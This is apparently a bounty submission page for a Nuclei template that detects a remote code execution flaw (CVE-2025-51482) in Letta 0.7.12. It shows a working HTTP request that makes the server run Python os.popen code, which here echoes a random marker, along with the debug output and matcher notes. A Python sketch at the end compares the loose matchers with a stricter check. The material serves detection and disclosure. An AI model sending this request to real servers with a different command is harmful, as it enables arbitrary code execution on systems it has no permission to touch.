Template / PR Information

Template Validation

  • YES

  • NO

  • Template: http/cves/2025/CVE-2025-51482.yaml

  • Verification approach: Executes a benign echo via provided Python tool source and matches the randomized marker in the JSON response on success. Includes a minimal json_schema to satisfy server validation.

Additional Details

  • Verify:

    nuclei -t http/cves/2025/CVE-2025-51482.yaml -u http://127.0.0.1:8283 -debug -vv -duc > debug.txt
  • Matched response data snippet (redacted)

    {
      "message_type": "tool_return_message",
      "status": "success",
      "tool_return": "34jGBtQJnZwGwp45es0f7zAeW5P\n",
      "stdout": [],
      "stderr": []
    }
  • HTTP request excerpt

    POST /v1/tools/run HTTP/1.1
    Content-Type: application/json

    {
      "name": "nuclei",
      "args": {},
      "json_schema": {"type":"object","properties":{}},
      "source_code": "def nuclei():\n import os\n return os.popen('echo {{randstr}}').read()"
    }
  • Nuclei debug highlights

    [letta-tools-run-rce] Letta Letta 0.7.12 - Remote Code Execution (@raghavarora14) [high]
    HTTP/1.1 200 OK
    Content-Type: application/json
    {"tool_return":"34jJTKisa9wTQ9l2arhBBiGHTYn\n","status":"success","stdout":[],"stderr":[]}
    [letta-tools-run-rce:status-1] [http] [high] http://127.0.0.1:8283/v1/tools/run
    [letta-tools-run-rce:word-2] [http] [high] http://127.0.0.1:8283/v1/tools/run
    [letta-tools-run-rce:word-3] [http] [high] http://127.0.0.1:8283/v1/tools/run
Detection Notes

  • Matchers: HTTP 200; header contains application/json; body contains randomized marker.
  • Behavior-based: No version checks; active server-side validation.
  • Verified: metadata.verified: true set after local Docker validation.

Environment Notes

  • Validated with Letta 0.7.12 in Docker (compose mailed).
  • If server enforces schema, json_schema is included to pass validation.
  • If auth is required, template can be extended with a token variable and Authorization header (not required here).

Contact for Validation Instance

  • Reproducible Docker setup included (poc/letta-cve-2025-51482/).
  • A temporary remote instance URL and time window will be shared privately with the PD team upon request for validation.

Additional References

Claim

Total prize pool $100
Total paid $0
Status Pending
Submitted October 29, 2025
Last updated October 29, 2025

Contributors

Raghav Arora

@RaghavArora14

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$100
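
The three matchers listed under Detection Notes accept any 200 JSON response whose body contains the marker, so a server that only reflects the submitted input would also match. The sketch below is an added example, not part of the PR or the template; it compares that check with a stricter one that parses the JSON and requires the marker to be the `tool_return` value of a `success` result. The function names and the reflected response are constructed for illustration, and the reflecting behaviour is an assumption, not something observed on Letta.

```python
import json


def word_matchers(status, headers, body, marker):
    """The three matchers from Detection Notes, applied as plain checks."""
    ctype = headers.get("Content-Type", "")
    return status == 200 and "application/json" in ctype and marker in body


def strict_match(status, headers, body, marker):
    """Same preconditions, but the marker must be the tool's own return value."""
    if not word_matchers(status, headers, body, marker):
        return False
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict) or doc.get("status") != "success":
        return False
    value = doc.get("tool_return")
    # The echoed marker arrives with a trailing newline, so compare after strip().
    return isinstance(value, str) and value.strip() == marker


JSON_HEADERS = {"Content-Type": "application/json"}
MARKER = "34jJTKisa9wTQ9l2arhBBiGHTYn"  # marker seen in the debug output above

# Response body copied from the Nuclei debug highlights on this page.
EXECUTED = ('{"tool_return":"34jJTKisa9wTQ9l2arhBBiGHTYn\\n",'
            '"status":"success","stdout":[],"stderr":[]}')

# Constructed sample (assumption): a server that rejects the tool but reflects
# the submitted text, marker included, in an error field.
REFLECTED = json.dumps({
    "status": "error",
    "tool_return": "",
    "stdout": [],
    "stderr": ["rejected source: echo " + MARKER],
})


def compare(body):
    """Return (word matcher verdict, strict verdict) for a 200 JSON response."""
    return (word_matchers(200, JSON_HEADERS, body, MARKER),
            strict_match(200, JSON_HEADERS, body, MARKER))


if __name__ == "__main__":
    print("executed :", compare(EXECUTED))
    print("reflected:", compare(REFLECTED))
```
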